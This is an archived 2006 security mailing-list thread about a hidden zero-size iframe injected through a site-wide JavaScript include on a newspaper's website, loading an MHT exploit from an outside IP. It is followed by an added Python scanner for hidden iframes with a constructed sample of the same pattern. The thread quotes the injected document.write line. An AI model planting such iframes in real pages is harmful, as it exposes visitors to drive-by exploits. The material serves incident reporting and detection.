[Dshield] New York Newspaper hacked

Tom dshield at oitc.com
Mon Feb 27 12:36:34 GMT 2006


At 8:57 PM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
>On Sun, 26 Feb 2006, Tom wrote:
>
>>  At 8:37 AM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
>>  >Anyone know a human at the observer in New York?
>>  >
>>  >Someone has put an iframe exploit into the code inserted on each page.
>>  >
>>  >Don't go here:
>>  >
>>  >http://
>>  >www.observer.com/ 20060227 / 20060227_Joe_Conason_opinions_conason.asp
>>
>>  All I see are iframes being used for ads as seen below.
>>  advertserve.com seems like a totally legit biz and I pulled some ads
>>  and they are legit also. What made you think this is an exploit?
>
>The iframe is inserted on every page, lives here,
>www.observer.com// includes/ nyo.js
>
>  and reads
>document.write('<iframe height=0 width=0
>src="http:// 210.118.120.49/ HitCount/ Top.Htm"></iframe>');
>
>It seems it was inserted last Sunday.
>
>This, when retrieved, is an mht exploit.
>
>The less daring can see a jpg of its effect here
>http://rrcs-24-106-25-102.west.biz.rr.com/exploit.jpg
>
>210.118.120.49 these guys don't answer their abuse email:
>[ ISP IPv4 Admin Contact Information ]
>Name               : IPAdministrator
>Phone              : +82-2-509-0534
>E-Mail             : snnoc at samsung.com
>
>[ ISP IPv4 Tech Contact Information ]
>Name               : IP Manager
>Phone              : +82-2-509-0534
>E-Mail             : snnoc at samsung.com
>
>[ ISP Network Abuse Contact Information ]
>Name               : NetworkAbuse
>Phone              : +82-2-509-0534
>E-Mail             : ipabuse at samsung.com

I stand corrected, as I didn't look into the js; I only curl'd a few
files. Thanks Paul.

btw, 210.118.120.49 contact is help at etimes.net

Tom
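The thread above turns on a detail Tom missed on first look: the injected iframe lived inside a site-wide JavaScript include (nyo.js) and was written with document.write(), so a quick curl of a few HTML pages showed only the legitimate ad iframes. The following is an added example, not code from the thread or from either poster: a small scanner that pulls iframe tags out of fetched HTML or JS text (including ones inside document.write strings), marks those that are hidden (zero height/width or display:none), and classifies where the src points. The sample content, the 203.0.113.5 address (documentation range) and the ad host name are constructed stand-ins for the pattern the thread describes, not the real observer.com include.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample standing in for a site-wide JS include. It mixes a
# visible third-party ad iframe (like the advertserve ones Tom saw), a
# hidden 0x0 iframe to an IP-literal host (the pattern Paul reported, with
# a documentation-range address substituted), and a hidden same-origin one.
SAMPLE_JS = """
function showAd() {
  document.write('<iframe height=250 width=300 src="http://ads.example-adserver.test/banner"></iframe>');
}
document.write('<iframe height=0 width=0 src="http://203.0.113.5/HitCount/Top.Htm"></iframe>');
document.write('<iframe style="display: none" src="/includes/track.html"></iframe>');
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value pairs; value may be double-quoted, single-quoted, or bare
ATTR_RE = re.compile(r"""(\w[\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def parse_attrs(attr_text):
    """Turn the inside of an <iframe ...> tag into a lowercase-keyed dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def is_zero(value):
    """True for sizes like 0, 00, 0.0 or 0px (the classic hidden-iframe trick)."""
    return re.fullmatch(r"\s*0+(\.0+)?(px)?\s*", value or "") is not None


def is_hidden(attrs):
    """An iframe with no visible area, or styled invisible, is hidden."""
    if is_zero(attrs.get("height")) or is_zero(attrs.get("width")):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def classify_host(src, page_host):
    """same-origin (relative or matching host), ip-literal, or third-party."""
    host = urlparse(src).hostname or ""
    if not host:
        return "same-origin"
    try:
        ip_address(host)
        return "ip-literal"
    except ValueError:
        pass
    if host == page_host or host.endswith("." + page_host):
        return "same-origin"
    return "third-party"


def find_suspicious_iframes(content, page_host):
    """Scan HTML or JS text and return one finding per iframe with a severity.

    high   : hidden and pointing off-site (IP literal or third-party host)
    medium : hidden but same-origin (worth a look, may be legitimate tracking)
    info   : visible, off-site (ordinary ads; listed for completeness)
    low    : visible, same-origin
    """
    findings = []
    for m in IFRAME_RE.finditer(content):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        hidden = is_hidden(attrs)
        kind = classify_host(src, page_host)
        if hidden and kind != "same-origin":
            severity = "high"
        elif hidden:
            severity = "medium"
        elif kind != "same-origin":
            severity = "info"
        else:
            severity = "low"
        findings.append({"src": src, "hidden": hidden,
                         "host_kind": kind, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_JS, "www.observer.com"):
        print(f"[{f['severity']:<6}] hidden={f['hidden']!s:<5} {f['host_kind']:<12} {f['src']}")
```

Run it over every script the site serves, not only the HTML, since that is where this injection hid. The host check is deliberately simple (an exact or subdomain match against the page host); a production version would compare registrable domains and keep an allowlist of known ad servers so the "info" entries do not drown the "high" ones.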

